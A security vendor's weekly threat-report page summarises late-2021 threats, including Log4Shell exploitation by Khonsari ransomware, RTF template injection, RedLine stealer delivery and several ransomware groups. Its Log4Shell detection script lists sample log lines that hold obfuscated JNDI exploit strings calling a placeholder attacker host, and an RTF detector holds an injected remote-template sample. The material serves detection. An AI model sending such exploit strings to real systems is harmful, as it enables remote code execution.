The Anvilogic Threat Reports
Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings and run exposure checks on your endpoint devices and servers, which can help identify a successful payload delivery and compromise through a given vulnerability.
- Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
- Strategic: General information security news, for awareness
About the Team
The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.
Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.
We curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our craft are:
- Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
- Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
- Reports hot off the forge:
  - Threat News Reports
  - Trending Threat Reports
  - Research Articles
If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at firstname.lastname@example.org.
Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.
If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us; we’re happy to help: email@example.com
Khonsari Ransomware & Log4Shell
Industry: N/A | Level: Tactical | Source: CadoSecurity
The Khonsari ransomware family has been observed exploiting the CVE-2021-44228 (Log4Shell) vulnerability to target Windows servers. The malware executable “groenhuyzen.exe” is dropped through exploitation of the JNDI class. The malware’s functionality is straightforward: at only 12 KB, it enumerates and encrypts (with the extension .khonsari) all mounted drives with the exception of C:\. Only user directories are encrypted, including Documents, Videos, Pictures, Downloads, and Desktop.
- Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell
CVE-2021-44228 / Log4Shell Vulnerability
A zero-day exploit has been identified for the Java logging library “log4j” that could result in remote code execution. Affected versions include Log4j 2.0-beta9 up to 2.14.1, with service impacts to many Apache Struts configurations and cloud services such as Steam, Apple iCloud, and others.
The exploit requires three components: a vulnerable log4j version, any protocol that allows the attacker to send the exploit string, and a log statement that logs the string from the request.
Mitigation is available through an update; affected users are recommended to update to log4j version “log4j-2.15.0-rc2”. Threat researchers have identified a variety of threats taking advantage of the widespread vulnerability: Kinsing (cryptocurrency miner), Mirai malware, Cobalt Strike, a new unidentified ransomware strain, and likely others yet to be identified.
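Since the third component above is a log statement that records attacker-controlled input, one place to hunt for this exploit is the request logs themselves. The following Python is an added example (not code from the Anvilogic report): it collapses Log4j 2.x lookup nesting (`${lower:…}`, `${upper:…}` and `${…:-default}` forms) from the inside out and then flags lines that resolve to a JNDI lookup; the log lines and the host `attacker.example` are constructed.

```python
import re

# Constructed request-log lines (not from the report); "attacker.example" is a placeholder host
SAMPLE_LOGS = [
    '10.0.0.5 "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.8 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.9 "GET /?q=${env:HOME} HTTP/1.1" 200 "curl/7.79"',
]

# An innermost ${...} lookup: no nested "$", "{" or "}" between the braces
_INNER = re.compile(r'\$\{([^${}]*)\}')

def _resolve(body):
    """Approximate Log4j 2.x evaluation of one innermost lookup body."""
    # "${key:-default}" (including the degenerate "${::-x}") yields the default text
    if ':-' in body:
        return body.split(':-', 1)[1]
    prefix, sep, arg = body.partition(':')
    if sep and prefix.lower() == 'lower':
        return arg.lower()
    if sep and prefix.lower() == 'upper':
        return arg.upper()
    return '${' + body + '}'  # other lookups (jndi, env, ...) are left in place

def normalize_lookups(text, max_rounds=20):
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        expanded = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if expanded == text:
            return text
        text = expanded
    return text

# Log4j resolves lookup prefixes case-insensitively, so match the same way
_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)

def find_jndi_lookups(lines):
    """Return (1-based line number, normalized line) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits

if __name__ == '__main__':
    for n, norm in find_jndi_lookups(SAMPLE_LOGS):
        print(f'line {n}: {norm}')
```

Line 5 contains a lookup but not a JNDI one, so it is not reported; a stricter policy could flag any surviving `${…}` in user-supplied fields.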
Magecart Abuses Google Tag Manager
Industry: eCommerce | Level: Strategic | Source: GeminiAdvisory
ANSSI Alerts of Nobelium Targeting French Organizations
Industry: Diplomatic | Level: Strategic | Source: ANSSI
The French national cyber-security agency, ANSSI, raised an alert detailing Nobelium phishing campaigns directed at French entities. Observation of the campaign began in February 2021, with a noticeable escalation in May. French email accounts are compromised and then used to send weaponized emails to foreign institutions in the diplomatic sector. The threat group is utilizing various hosting providers, mainly OVH SAS, Hydra Communications Ltd, M247 Ltd and 12 additional observed hosting providers.
NSO Spyware Compromises US State Department Employees’ Phones
Industry: Government | Level: Strategic | Source: Reuters
Apple Inc. has informed at least nine US Department of State employees that their iPhones had been compromised by NSO Pegasus spyware. Impacted officials were all either based in Uganda or focused on matters concerning the East African country, as shared by two Reuters sources. The compromises occurred within the last several months.
RTF Template Injection
Industry: Energy (Deepwater) & Government | Level: Tactical | Source: ProofPoint
Proofpoint has observed increased usage of RTF template injection by threat actors TA423, DoNot Team, and Gamaredon since as early as February 2021, with files publicly identified on April 5th. The template injection enables the threat actor to alter the RTF file’s control word structure to substitute a legitimate file destination with a URL that could download a malicious payload. Detection rates for this technique have so far been low. The APT groups have been targeting various organizations and countries with this technique: DoNot Team and TA423 are both associated with targeting Malaysia’s deepwater energy exploration, while Gamaredon targeted the Ukrainian government.
- Anvilogic Use Cases:
  - Malicious Document Execution
  - Abuse EQNEDT32.EXE CVE-2017-11882
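Because the injection lives in the `{\*\template …}` destination group of the RTF control-word structure described above, a file can be triaged without opening it. The following Python is an added example (not code from Proofpoint or Anvilogic): it extracts the template destination, decodes RTF `\'hh` hex escapes that are valid in that field, and reports whether the destination is remote; the RTF fragments and the host `template.invalid` are constructed.

```python
import re

# Constructed RTF fragments (not from the report); "template.invalid" is a placeholder host
BENIGN_RTF = rb'{\rtf1\ansi{\*\template C:\\Templates\\Normal.dotm}\pard Hello\par}'
INJECTED_RTF = rb'{\rtf1\ansi{\*\template http://template.invalid/doc.dotm}\pard Hello\par}'
# Same remote destination, with its first byte written as the RTF hex escape \'68 ("h")
HEX_ESCAPED_RTF = rb"{\rtf1\ansi{\*\template \'68ttp://template.invalid/doc.dotm}\pard Hello\par}"

# The {\*\template <destination>} group names the document template Word will attach
_TEMPLATE_GROUP = re.compile(rb'\{\\\*\\template\s+([^{}]*)\}', re.IGNORECASE)
# Standard RTF hex escape for a single byte, e.g. \'68
_HEX_ESCAPE = re.compile(rb"\\'([0-9a-fA-F]{2})")

def template_destination(rtf):
    """Return the template destination as text, or None if the file declares none."""
    m = _TEMPLATE_GROUP.search(rtf)
    if not m:
        return None
    raw = _HEX_ESCAPE.sub(lambda h: bytes([int(h.group(1), 16)]), m.group(1).strip())
    return raw.decode('latin-1')

def is_remote_template(rtf):
    """True when the template points at a URL or UNC path rather than a local file."""
    dest = template_destination(rtf)
    if dest is None:
        return False
    return re.match(r'(https?|ftp)://|\\\\', dest, re.IGNORECASE) is not None

if __name__ == '__main__':
    for name, doc in [('benign', BENIGN_RTF), ('injected', INJECTED_RTF), ('hex-escaped', HEX_ESCAPED_RTF)]:
        print(name, template_destination(doc), is_remote_template(doc))
```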
Microsoft Excel (XLL) Leads to RedLine Info-Stealer
Industry: N/A | Level: Tactical | Source: BleepingComputer
Threat actors are utilizing public discussion forums, or article comment systems, to spread malicious Excel documents that ultimately download and install the RedLine information stealer. Malicious links are hosted on Google Drive and download an XLL, which BleepingComputer describes as “an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks. XLL files are simply a DLL file that includes an ‘xlAutoOpen’ function executed by Microsoft Excel when the add-in is opened.” While tests have had unsuccessful executions, potentially due to incompatible versions of Microsoft Excel, the sequence appears to involve the DLL being executed with regsvr32 or rundll32, which extracts the wget.exe program to download the RedLine binary, saving it as %UserProfile%\JavaBridge32.
- Anvilogic Scenario: Malicious Document Delivering Malware
- Anvilogic Use Cases:
  - regsvr32 Execution
  - Rundll32 Command Line
  - Invoke-WebRequest Command
Yanluowang Ransomware Linked to Thieflock Affiliate
Industry: Consultancy, Engineering, Financial & Manufacturing | Level: Tactical | Source: Symantec
The Yanluowang ransomware group, active since at least August 2021, has been targeting US corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been utilizing TTPs similar to those of Thieflock ransomware attacks. Based on observations by Symantec, there appears to be a link, or a shifting of allegiances, from Thieflock to the Yanluowang ransomware family. Notable observed TTP patterns include the usage of BazarLoader for initial access, PowerShell to download tools and enable RDP in the registry, AdFind for reconnaissance, and various other credential-stealing tools.
BlackByte Ransomware from RedCanary
Industry: N/A | Level: Tactical | Source: RedCanary
RedCanary presented research from a BlackByte ransomware incident response engagement with Kroll. The attack sequence covered initial access via ProxyShell and a web shell, post-exploitation with Cobalt Strike, impairing defenses through process monitoring, Windows Defender, and firewall modifications, through to ransomware deployment and file exfiltration.
- Anvilogic Scenario: BlackByte Behaviors
Industry: Critical Infrastructure | Level: Tactical | Source: FBI
The FBI released a flash report on Cuba ransomware, which, based on tracking since November 2021, has compromised 49 entities across various critical infrastructure sectors, including but not limited to financial, government, healthcare, manufacturing, and information technology. Hancitor malware is identified as the initial infection vector that leads to Cuba ransomware. Threat actors utilize phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, and RDP tools to gain initial access. Many legitimate Windows services, such as PowerShell and PsExec, are employed by the threat actors as well, in addition to leveraging Windows admin privileges to execute their ransomware.
- Anvilogic Scenario: Hancitor & Cuba Ransomware
- Anvilogic Use Cases:
  - Executable Process from Suspicious Folder
  - PSexec Service Creation
  - Remote Admin Tools